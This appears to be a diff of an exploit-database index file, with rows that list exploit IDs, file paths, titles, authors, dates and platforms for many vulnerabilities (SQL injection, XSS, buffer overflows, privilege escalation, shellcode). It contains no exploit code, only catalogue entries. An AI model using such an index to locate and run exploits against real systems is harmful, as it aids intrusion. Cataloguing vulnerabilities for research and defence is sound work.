- zero_transact_user.php Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0 +33759,platforms/multiple/webapps/33759.txt,"DirectAdmin <= 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability",2010-03-14,r0t,multiple,webapps,0 33748,platforms/php/webapps/33748.txt,"AneCMS 1.0 - 'index.php' Multiple HTML Injection Vulnerabilities",2010-03-11,"pratul agrawal",php,webapps,0 33749,platforms/php/webapps/33749.txt,"ARTIS ABTON CMS - Multiple SQL Injection Vulnerabilities",2010-03-11,MustLive,php,webapps,0 33750,platforms/windows/remote/33750.txt,"Microsoft Windows XP/2000 - Help File Relative Path Remote Command Execution Vulnerability",2010-03-06,Secumania,windows,remote,0 @@ -30409,15 +30417,13 @@ id,file,description,date,author,platform,type,port 33756,platforms/php/webapps/33756.txt,"Joomla! 'com_seek' Component - 'id' Parameter SQL Injection Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0 33757,platforms/php/webapps/33757.txt,"Joomla! 'com_d-greinar' Component - 'maintree' Parameter Cross-Site Scripting Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0 33758,platforms/asp/webapps/33758.txt,"Zigurrat Farsi CMS 'manager/textbox.asp' SQL Injection Vulnerability",2010-03-15,Isfahan,asp,webapps,0 -33759,platforms/multiple/webapps/33759.txt,"DirectAdmin <= 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability",2010-03-14,r0t,multiple,webapps,0 -33760,platforms/multiple/webapps/33760.txt,"Multiple Products 'banner.swf' Cross-Site Scripting Vulnerability",2010-03-15,MustLive,multiple,webapps,0 -33761,platforms/asp/webapps/33761.txt,"Pars CMS 'RP' Parameter Multiple SQL Injection Vulnerabilities",2010-03-15,Isfahan,asp,webapps,0 33762,platforms/php/webapps/33762.txt,"Andromeda 1.9.2 - 's' Parameter Cross-Site Scripting and Session Fixation Vulnerabilities",2010-03-15,indoushka,php,webapps,0 33763,platforms/php/webapps/33763.txt,"Domain Verkaus & Auktions Portal 'index.php' SQL Injection Vulnerability",2010-03-15,"Easy Laster",php,webapps,0 33764,platforms/multiple/webapps/33764.txt,"Dojo Toolkit <= 1.4.1 dijit\tests\_testCommon.js theme Parameter XSS",2010-03-15,"Adam Bixby",multiple,webapps,0 33765,platforms/multiple/webapps/33765.txt,"Dojo Toolkit <= 1.4.1 doh\runner.html Multiple Parameter XSS",2010-03-15,"Adam Bixby",multiple,webapps,0 33766,platforms/php/webapps/33766.txt,"Joomla! 'com_as' Component - 'catid' Parameter SQL Injection Vulnerability",2010-03-16,N2n-Hacker,php,webapps,0 33767,platforms/novell/remote/33767.rb,"Novell eDirectory 8.8.5 DHost Weak Session Cookie Session Hijacking Vulnerability",2010-03-14,metasploit,novell,remote,0 +33787,platforms/php/webapps/33787.txt,"RepairShop2 index.php Prod Parameter XSS",2010-03-23,kaMtiEz,php,webapps,0 33769,platforms/php/webapps/33769.txt,"eFront 3.5.5 - 'langname' Parameter Local File Include Vulnerability",2010-03-17,7Safe,php,webapps,0 33770,platforms/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - AVI File Colorspace Conversion Remote Memory Corruption Vulnerability",2010-03-17,ITSecTeam,windows,dos,0 33771,platforms/php/webapps/33771.txt,"Joomla! 'com_alert' Component - 'q_item' Parameter SQL Injection Vulnerability",2010-03-17,N2n-Hacker,php,webapps,0 @@ -30436,7 +30442,6 @@ id,file,description,date,author,platform,type,port 33784,platforms/php/webapps/33784.txt,"vBulletin 4.0.2 - Search Cross-Site Scripting Vulnerability",2010-03-19,5ubzer0,php,webapps,0 33785,platforms/jsp/webapps/33785.txt,"agXchange ESM 'ucquerydetails.jsp' Cross-Site Scripting Vulnerability",2010-03-23,Lament,jsp,webapps,0 33786,platforms/multiple/remote/33786.txt,"Cafu 9.06 - Multiple Remote Vulnerabilities",2010-03-23,"Luigi Auriemma",multiple,remote,0 -33787,platforms/php/webapps/33787.txt,"RepairShop2 index.php Prod Parameter XSS",2010-03-23,kaMtiEz,php,webapps,0 33788,platforms/php/webapps/33788.pl,"phpAuthent 0.2.1 - 'useradd.php' Multiple HTML Injection Vulnerabilities",2010-03-23,Yoyahack,php,webapps,0 33789,platforms/multiple/remote/33789.rb,"Java Debug Wire Protocol Remote Code Execution",2014-06-17,metasploit,multiple,remote,8000 33790,platforms/windows/remote/33790.rb,"Easy File Management Web Server Stack Buffer Overflow",2014-06-17,metasploit,windows,remote,80 @@ -30455,6 +30460,8 @@ id,file,description,date,author,platform,type,port 33803,platforms/hardware/webapps/33803.txt,"ZTE WXV10 W300 - Multiple Vulnerabilities",2014-06-18,"Osanda Malith",hardware,webapps,0 33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0 33805,platforms/linux/remote/33805.pl,"AlienVault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution",2014-06-18,"Alfredo Ramirez",linux,remote,0 +34141,platforms/php/webapps/34141.txt,"AneCMS 1.x - 'modules/blog/index.php' SQL Injection Vulnerability",2010-06-11,"High-Tech Bridge SA",php,webapps,0 +33976,platforms/php/webapps/33976.html,"Saurus CMS 4.7 - 'edit.php' Cross-Site Scripting Vulnerability",2010-05-11,"High-Tech Bridge SA",php,webapps,0 33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888 33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0 33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0 @@ -30471,6 +30478,8 @@ id,file,description,date,author,platform,type,port 33820,platforms/php/webapps/33820.txt,"PotatoNews 1.0.2 - 'nid' Parameter Multiple Local File Include Vulnerabilities",2010-04-07,mat,php,webapps,0 33821,platforms/php/webapps/33821.html,"n-cms-equipe 1.1c.Debug Multiple Local File Include Vulnerabilities",2010-02-24,ITSecTeam,php,webapps,0 33822,platforms/hardware/webapps/33822.sh,"D-link DSL-2760U-E1 - Persistent XSS",2014-06-21,"Yuval tisf Nativ",hardware,webapps,0 +33852,platforms/windows/remote/33852.txt,"HTTP 1.1 GET Request Directory Traversal Vulnerability",2010-06-20,chr1x,windows,remote,0 +33853,platforms/php/webapps/33853.txt,"Kleophatra CMS 0.1.1 - 'module' Parameter Cross-Site Scripting Vulnerability",2010-04-19,anT!-Tr0J4n,php,webapps,0 33824,platforms/linux/local/33824.c,"Linux Kernel <= 3.13 - Local Privilege Escalation PoC (gid)",2014-06-21,"Vitaly Nikolenko",linux,local,0 33825,platforms/asp/webapps/33825.txt,"Ziggurat Farsi CMS 'id' Parameter Unspecified Cross-Site Scripting Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0 33826,platforms/linux/remote/33826.txt,"TCPDF 4.5.036/4.9.5 - 'params' Attribute Remote Code Execution Weakness",2010-04-08,apoc,linux,remote,0 @@ -30482,30 +30491,37 @@ id,file,description,date,author,platform,type,port 33834,platforms/php/webapps/33834.txt,"Vana CMS 'filename' Parameter Remote File Download Vulnerability",2010-04-13,"Pouya Daneshmand",php,webapps,0 33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 - Multiple Local File Include Vulnerabilities",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0 33836,platforms/windows/shellcode/33836.txt,"Windows All Versions - Add Admin User Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0 -33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 - Remote Buffer Overflow Vulnerability",2010-04-15,mr_me,windows,dos,0 33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 - 'jtfwcpnt.jsp' SQL Injection Vulnerability",2010-04-15,"Joxean Koret",multiple,remote,0 33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0 33841,platforms/windows/remote/33841.txt,"HTTP File Server 2.2 Security Bypass and Denial of Service Vulnerabilities",2010-04-19,"Luigi Auriemma",windows,remote,0 -33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST parameter) SQL Injection Vulnerability",2014-06-23,"Filippos Mastrogiannis",php,webapps,0 +33880,platforms/windows/remote/33880.rb,"Cogent DataHub Command Injection",2014-06-25,metasploit,windows,remote,0 +33857,platforms/php/webapps/33857.txt,"e107 0.7.x - 'e107_admin/banner.php' SQL Injection Vulnerability",2010-04-21,"High-Tech Bridge SA",php,webapps,0 +33997,platforms/php/webapps/33997.txt,"NPDS Revolution 10.02 - 'download.php' Cross-Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0 +33998,platforms/php/webapps/33998.html,"JoomlaTune JComments 2.1 Joomla! Component - 'ComntrNam' Parameter Cross-Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0 33847,platforms/multiple/remote/33847.txt,"netkar-PRO 1.1 - Remote Stack Buffer Overflow Vulnerability",2010-04-13,"Luigi Auriemma",multiple,remote,0 33848,platforms/windows/remote/33848.py,"WinMount 3.3.401 ZIP File Remote Buffer Overflow Vulnerability",2010-04-19,lilf,windows,remote,0 +33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST parameter) SQL Injection Vulnerability",2014-06-23,"Filippos Mastrogiannis",php,webapps,0 33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - (.nkuser) File Creation NULL Pointer Denial Of Service Vulnerability",2014-06-13,"A reliable source",windows,dos,0 33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 Memory Consumption Remote Denial of Service Vulnerability",2010-04-27,fallenpegasus,linux,dos,0 33851,platforms/php/webapps/33851.txt,"Wordpress TimThumb 2.8.13 WebShot - Remote Code Execution (0day)",2014-06-24,@u0x,php,webapps,0 -33852,platforms/windows/remote/33852.txt,"HTTP 1.1 GET Request Directory Traversal Vulnerability",2010-06-20,chr1x,windows,remote,0 -33853,platforms/php/webapps/33853.txt,"Kleophatra CMS 0.1.1 - 'module' Parameter Cross-Site Scripting Vulnerability",2010-04-19,anT!-Tr0J4n,php,webapps,0 +33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 Source Code Information Disclosure Vulnerability",2010-04-22,"Veerendra G.G",multiple,remote,0 +33860,platforms/windows/dos/33860.html,"Internet Explorer 8_ 9 & 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0 33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module 'externalredirect.php' Cross-Site Scripting Vulnerability",2010-04-20,"Edgard Chammas",php,webapps,0 +33881,platforms/php/webapps/33881.txt,"PowerEasy 2006 - 'ComeUrl' Parameter Cross-Site Scripting Vulnerability",2010-04-24,Liscker,php,webapps,0 33855,platforms/linux/remote/33855.txt,"MIT Kerberos 5 - 'src/kdc/do_tgs_req.c' Ticket Renewal Double Free Memory Corruption Vulnerability",2010-04-20,"Joel Johnson",linux,remote,0 33856,platforms/php/webapps/33856.txt,"Viennabux Beta! 'cat' Parameter SQL Injection Vulnerability",2010-04-09,"Easy Laster",php,webapps,0 -33857,platforms/php/webapps/33857.txt,"e107 0.7.x - 'e107_admin/banner.php' SQL Injection Vulnerability",2010-04-21,"High-Tech Bridge SA",php,webapps,0 33858,platforms/php/webapps/33858.txt,"DBSite wb CMS 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0 -33860,platforms/windows/dos/33860.html,"Internet Explorer 8, 9 & 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0 +34143,platforms/windows/remote/34143.txt,"XnView <= 1.97.4 - MBM File Remote Heap Buffer Overflow Vulnerability",2010-06-14,"Mauro Olea",windows,remote,0 +34144,platforms/php/webapps/34144.txt,"Joomla! 'com_easygb' Component - 'Itemid' Parameter Cross-Site Scripting Vulnerability",2010-06-08,"L0rd CrusAd3r",php,webapps,0 +34145,platforms/unix/dos/34145.txt,"Python <= 3.2 - 'audioop' Module Memory Corruption Vulnerability",2010-06-14,haypo,unix,dos,0 +34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login Multiple SQL Injection Vulnerabilities",2010-06-15,"L0rd CrusAd3r",php,webapps,0 +34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 - 'username' Parameter Cross-Site Scripting Vulnerability",2010-06-06,"Adam Baldwin",php,webapps,0 33862,platforms/hardware/remote/33862.rb,"D-Link authentication.cgi Buffer Overflow",2014-06-24,metasploit,hardware,remote,80 33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,metasploit,hardware,remote,80 33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,metasploit,linux,remote,40007 33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password CSRF",2014-06-25,nopesled,hardware,webapps,0 33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 - Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0 -33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 Source Code Information Disclosure Vulnerability",2010-04-22,"Veerendra G.G",multiple,remote,0 +34142,platforms/php/webapps/34142.txt,"MODx 1.0.3 - 'index.php' Multiple SQL Injection Vulnerabilities",2010-06-14,"High-Tech Bridge SA",php,webapps,0 33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure Vulnerability",2010-04-22,hkm,hardware,remote,0 33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 - 'id' Parameter Cross-Site Scripting Vulnerability",2010-04-22,Valentin,php,webapps,0 33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 - Multiple Input Validation Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0 @@ -30516,8 +30532,6 @@ id,file,description,date,author,platform,type,port 33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET <= 12.0 - Remote Root Exploit",2007-09-25,mu-b,multiple,remote,0 33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET <= 12.0 - Remote SYSTEM Exploit",2007-09-25,mu-b,multiple,remote,0 33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP <= 13.0 Remote DoS",2007-10-02,mu-b,multiple,dos,0 -33880,platforms/windows/remote/33880.rb,"Cogent DataHub Command Injection",2014-06-25,metasploit,windows,remote,0 -33881,platforms/php/webapps/33881.txt,"PowerEasy 2006 - 'ComeUrl' Parameter Cross-Site Scripting Vulnerability",2010-04-24,Liscker,php,webapps,0 33882,platforms/php/webapps/33882.txt,"Cyber CMS 'faq.php' SQL Injection Vulnerability",2009-11-26,hc0de,php,webapps,0 33883,platforms/php/webapps/33883.txt,"Kasseler CMS 2.0.5 - 'index.php' Cross-Site Scripting Vulnerability",2010-04-26,indoushka,php,webapps,0 33884,platforms/php/webapps/33884.txt,"Zikula Application Framework 1.2.2 ZLanguage.php lang Parameter XSS",2010-04-13,"High-Tech Bridge SA",php,webapps,0 @@ -30537,12 +30551,25 @@ id,file,description,date,author,platform,type,port 33899,platforms/linux/local/33899.txt,"chkrootkit 0.49 - Local Root Vulnerability",2014-06-28,"Thomas Stangner",linux,local,0 33900,platforms/windows/remote/33900.pl,"Serenity Audio Player 3.2.3 - (.m3u) Buffer Overflow Vulnerability",2010-04-26,Madjix,windows,remote,0 33901,platforms/windows/remote/33901.rb,"Serenity Audio Player 3.2.3 - (.m3u) Buffer Overflow Vulnerability (meta)",2010-04-26,blake,windows,remote,0 +34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80 33904,platforms/linux/local/33904.txt,"check_dhcp 2.0.2 (Nagios Plugins) - Arbitrary Option File Read Race Condition Exploit",2014-06-28,"Dawid Golunski",linux,local,0 33905,platforms/multiple/remote/33905.txt,"Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cross-Site Scripting Vulnerability",2010-04-28,"arun kethipelly",multiple,remote,0 33906,platforms/php/webapps/33906.txt,"velBox 1.2 Insecure Cookie Authentication Bypass Vulnerability",2010-04-28,indoushka,php,webapps,0 33907,platforms/multiple/remote/33907.txt,"ZKSoftware 'ZK5000' Remote Information Disclosure Vulnerability",2010-03-20,fb1h2s,multiple,remote,0 33908,platforms/php/webapps/33908.txt,"Your Articles Directory Login Option SQL Injection Vulnerability",2010-04-29,Sid3^effects,php,webapps,0 33909,platforms/php/webapps/33909.txt,"Tele Data's Contact Management Server 0.9 - 'username' Parameter SQL Injection Vulnerability",2010-04-28,"John Leitch",php,webapps,0 +33960,platforms/php/webapps/33960.txt,"ECShop 2.7.2 - 'category.php' SQL Injection Vulnerability",2010-05-07,Liscker,php,webapps,0 +33961,platforms/windows/local/33961.txt,"Ubisoft Uplay 4.6 - Insecure File Permissions Local Privilege Escalation",2014-07-03,LiquidWorm,windows,local,0 +33962,platforms/hardware/remote/33962.txt,"Cisco Application Control Engine (ACE) HTTP Parsing Security Weakness",2010-05-07,"Alexis Tremblay",hardware,remote,0 +33963,platforms/linux/local/33963.txt,"gdomap Multiple Local Information Disclosure Vulnerabilities",2010-05-07,"Dan Rosenberg",linux,local,0 +33964,platforms/windows/remote/33964.txt,"X-Motor Racing 1.26 - Buffer Overflow and Multiple Denial of Service Vulnerabilities",2010-05-06,"Luigi Auriemma",windows,remote,0 +33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 HTTP GET Request Denial Of Service Vulnerability",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 +33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data Denial Of Service Vulnerability",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 +33967,platforms/php/webapps/33967.txt,"Chipmunk Newsletter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,php,webapps,0 +33968,platforms/windows/dos/33968.pl,"Xitami 5.0 - '/AUX' Request Remote Denial Of Service Vulnerability",2010-05-10,"Usman Saeed",windows,dos,0 +33969,platforms/php/webapps/33969.txt,"eFront 3.x - 'ask_chat.php' SQL Injection Vulnerability",2010-05-09,"Stefan Esser",php,webapps,0 +33970,platforms/php/webapps/33970.txt,"EasyPublish CMS 23.04.2010 URI Cross-Site Scripting Vulnerability",2010-05-10,"High-Tech Bridge SA",php,webapps,0 +33971,platforms/windows/remote/33971.c,"Rebellion Aliens vs Predator 2.22 - Multiple Memory Corruption Vulnerabilities",2010-05-07,"Luigi Auriemma",windows,remote,0 33913,platforms/php/webapps/33913.html,"osCommerce 3.0a5 - Local File Include and HTML Injection Vulnerabilities",2010-04-30,"Jordi Chancel",php,webapps,0 33914,platforms/php/webapps/33914.txt,"4xcms 'login.php' Multiple SQL Injection Vulnerabilities",2010-03-21,"cr4wl3r ",php,webapps,0 33915,platforms/php/webapps/33915.txt,"Campsite 3.x - 'article_id' Parameter SQL Injection Vulnerability",2010-04-30,"Stefan Esser",php,webapps,0 @@ -30558,10 +30585,17 @@ id,file,description,date,author,platform,type,port 33925,platforms/php/webapps/33925.txt,"ecoCMS 18.4.2010 - 'admin.php' Cross-Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0 33926,platforms/windows/dos/33926.py,"ddrLPD 1.0 - Remote Denial of Service Vulnerability",2010-04-29,"Bisphemol A",windows,dos,0 33927,platforms/php/webapps/33927.txt,"eZoneScripts Apartment Search Script 'listtest.php' SQL Injection Vulnerability",2010-02-09,JIKO,php,webapps,0 +33988,platforms/php/remote/33988.txt,"PHP 5.x - 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0 +33989,platforms/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet Arbitrary File Upload",2014-07-07,metasploit,windows,remote,9002 33929,platforms/multiple/remote/33929.py,"Gitlist <= 0.4.0 - Remote Code Execution",2014-06-30,drone,multiple,remote,0 +33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,Provensec,php,webapps,80 +33959,platforms/asp/webapps/33959.txt,"Multiple Consona Products 'n6plugindestructor.asp' Cross-Site Scripting Vulnerability",2010-05-07,"Ruben Santamarta ",asp,webapps,0 +33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081 33933,platforms/php/webapps/33933.txt,"ThinkPHP 2.0 - 'index.php' Cross-Site Scripting Vulnerability",2010-02-09,zx,php,webapps,0 33934,platforms/php/webapps/33934.txt,"eZoneScripts Multiple Scripts Insecure Cookie Authentication Bypass Vulnerability",2009-02-09,JIKO,php,webapps,0 33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Command Unauthorized Access Vulnerability",2010-02-24,nks,windows,remote,0 +33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 - 'sid' Parameter SQL Injection Vulnerability",2010-05-06,"Christophe de la Fuente",cgi,webapps,0 +33957,platforms/php/webapps/33957.txt,"kloNews 2.0 - 'cat.php' Cross-Site Scripting Vulnerability",2010-01-20,"cr4wl3r ",php,webapps,0 33937,platforms/multiple/webapps/33937.txt,"TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 HTML Injection and Cross-Site Scripting Vulnerabilities",2010-05-05,MustLive,multiple,webapps,0 33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router 'Stat_Radio' Parameter Cross-Site Scripting Vulnerability",2010-02-04,"Karn Ganeshen",hardware,remote,0 33939,platforms/java/webapps/33939.txt,"ShopEx Single 4.5.1 - 'errinfo' Parameter Cross-Site Scripting Vulnerability",2010-02-06,"cp77fk4r ",java,webapps,0 @@ -30569,7 +30603,7 @@ id,file,description,date,author,platform,type,port 33941,platforms/windows/remote/33941.html,"TVUPlayer 2.4.4.9beta1 - 'PlayerOcx.ocx' Active X Control Arbitrary File Overwrite Vulnerability.",2010-02-03,"Evdokimov Dmitriy",windows,remote,0 33942,platforms/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 - 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",jsp,webapps,80 33943,platforms/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 - 4.3.3 - Aribtrary File Disclosure",2014-07-01,"BGA Security",aix,dos,8080 -33944,platforms/windows/remote/33944.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.x Bypass (MS12-037)",2014-07-01,sickness,windows,remote,0 +33944,platforms/windows/remote/33944.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR_ DEP & EMET 4.1.x Bypass (MS12-037)",2014-07-01,sickness,windows,remote,0 33945,platforms/php/webapps/33945.txt,"DeluxeBB 1.x - 'newpost.php' SQL Injection Vulnerability",2010-05-06,"Stefan Esser",php,webapps,0 33946,platforms/php/webapps/33946.txt,"EmiratesHost Insecure Cookie Authentication Bypass Vulnerability",2010-02-01,jago-dz,php,webapps,0 33947,platforms/php/webapps/33947.txt,"Last Wizardz 'id' Parameter SQL Injection Vulnerability",2010-01-31,"Sec Attack Team",php,webapps,0 @@ -30577,28 +30611,11 @@ id,file,description,date,author,platform,type,port 33949,platforms/linux/remote/33949.txt,"PCRE <= 6.2 Regular Expression Compiling Workspace Buffer Overflow Vulnerability",2010-05-06,"Michael Santos",linux,remote,0 33950,platforms/php/webapps/33950.txt,"HAWHAW 'newsread.php' SQL Injection Vulnerability",2010-01-31,s4r4d0,php,webapps,0 33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)",2014-07-02,LiquidWorm,windows,dos,0 -33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,Provensec,php,webapps,80 -33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081 -33957,platforms/php/webapps/33957.txt,"kloNews 2.0 - 'cat.php' Cross-Site Scripting Vulnerability",2010-01-20,"cr4wl3r ",php,webapps,0 -33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 - 'sid' Parameter SQL Injection Vulnerability",2010-05-06,"Christophe de la Fuente",cgi,webapps,0 -33959,platforms/asp/webapps/33959.txt,"Multiple Consona Products 'n6plugindestructor.asp' Cross-Site Scripting Vulnerability",2010-05-07,"Ruben Santamarta ",asp,webapps,0 -33960,platforms/php/webapps/33960.txt,"ECShop 2.7.2 - 'category.php' SQL Injection Vulnerability",2010-05-07,Liscker,php,webapps,0 -33961,platforms/windows/local/33961.txt,"Ubisoft Uplay 4.6 - Insecure File Permissions Local Privilege Escalation",2014-07-03,LiquidWorm,windows,local,0 -33962,platforms/hardware/remote/33962.txt,"Cisco Application Control Engine (ACE) HTTP Parsing Security Weakness",2010-05-07,"Alexis Tremblay",hardware,remote,0 -33963,platforms/linux/local/33963.txt,"gdomap Multiple Local Information Disclosure Vulnerabilities",2010-05-07,"Dan Rosenberg",linux,local,0 -33964,platforms/windows/remote/33964.txt,"X-Motor Racing 1.26 - Buffer Overflow and Multiple Denial of Service Vulnerabilities",2010-05-06,"Luigi Auriemma",windows,remote,0 -33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 HTTP GET Request Denial Of Service Vulnerability",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 -33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data Denial Of Service Vulnerability",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 -33967,platforms/php/webapps/33967.txt,"Chipmunk Newsletter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,php,webapps,0 -33968,platforms/windows/dos/33968.pl,"Xitami 5.0 - '/AUX' Request Remote Denial Of Service Vulnerability",2010-05-10,"Usman Saeed",windows,dos,0 -33969,platforms/php/webapps/33969.txt,"eFront 3.x - 'ask_chat.php' SQL Injection Vulnerability",2010-05-09,"Stefan Esser",php,webapps,0 -33970,platforms/php/webapps/33970.txt,"EasyPublish CMS 23.04.2010 URI Cross-Site Scripting Vulnerability",2010-05-10,"High-Tech Bridge SA",php,webapps,0 -33971,platforms/windows/remote/33971.c,"Rebellion Aliens vs Predator 2.22 - Multiple Memory Corruption Vulnerabilities",2010-05-07,"Luigi Auriemma",windows,remote,0 +34103,platforms/cgi/webapps/34103.txt,"Barracuda Networks Message Archiver 650 - Persistent XSS Vulnerability",2014-07-18,Vulnerability-Lab,cgi,webapps,3378 33972,platforms/php/webapps/33972.txt,"Advanced Poll 2.0 - 'mysql_host' Parameter Cross-Site Scripting Vulnerability",2010-05-10,"High-Tech Bridge SA",php,webapps,0 33973,platforms/windows/dos/33973.pl,"Hyplay 1.2.0326.1 - (.asx) Remote Denial of Service Vulnerability",2010-05-10,"Steve James",windows,dos,0 33974,platforms/windows/remote/33974.txt,"Mereo 1.9.1 - Directory Traversal Vulnerability",2010-05-09,"John Leitch",windows,remote,0 33975,platforms/php/webapps/33975.html,"Affiliate Store Builder 'edit_cms.php' Multiple SQL Injection Vulnerabilities",2010-05-11,"High-Tech Bridge SA",php,webapps,0 -33976,platforms/php/webapps/33976.html,"Saurus CMS 4.7 - 'edit.php' Cross-Site Scripting Vulnerability",2010-05-11,"High-Tech Bridge SA",php,webapps,0 33977,platforms/windows/dos/33977.txt,"Torque Game Engine - Multiple Denial Of Service Vulnerabilities",2010-05-09,"Luigi Auriemma",windows,dos,0 33978,platforms/php/webapps/33978.txt,"TomatoCMS 2.0.x SQL Injection Vulnerability",2010-05-12,"Russ McRee",php,webapps,0 33979,platforms/php/webapps/33979.txt,"C99Shell 1.0 pre-release buil 'Ch99.php' Cross-Site Scripting Vulnerability",2010-05-19,indoushka,php,webapps,0 @@ -30606,12 +30623,10 @@ id,file,description,date,author,platform,type,port 33981,platforms/windows/remote/33981.txt,"GameCore 2.5 - 'GameID' Integer Overflow Vulnerability",2010-05-13,"Luigi Auriemma",windows,remote,0 33982,platforms/php/webapps/33982.txt,"NPDS Revolution 10.02 - 'download.php' SQL Injection Vulnerability",2010-05-13,"High-Tech Bridge SA",php,webapps,0 33983,platforms/php/webapps/33983.txt,"Frog CMS 0.9.5 - Arbitrary File Upload",2014-07-06,"Javid Hussain",php,webapps,0 -33984,platforms/hardware/webapps/33984.rb,"Netgear WNR1000v3 - Password Recovery Credential Disclosure Vulnerability",2014-07-07,c1ph04,hardware,webapps,0 33985,platforms/php/webapps/33985.txt,"NPDS Revolution 10.02 - 'topic' Parameter Cross-Site Scripting Vulnerability",2010-05-13,"High-Tech Bridge SA",php,webapps,0 33986,platforms/php/webapps/33986.txt,"PHP File Uploader Remote File Upload Vulnerability",2010-01-03,indoushka,php,webapps,0 33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 - 'signupconfirm.php' Cross-Site Scripting Vulnerability",2010-01-03,indoushka,php,webapps,0 -33988,platforms/php/remote/33988.txt,"PHP 5.x - 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0 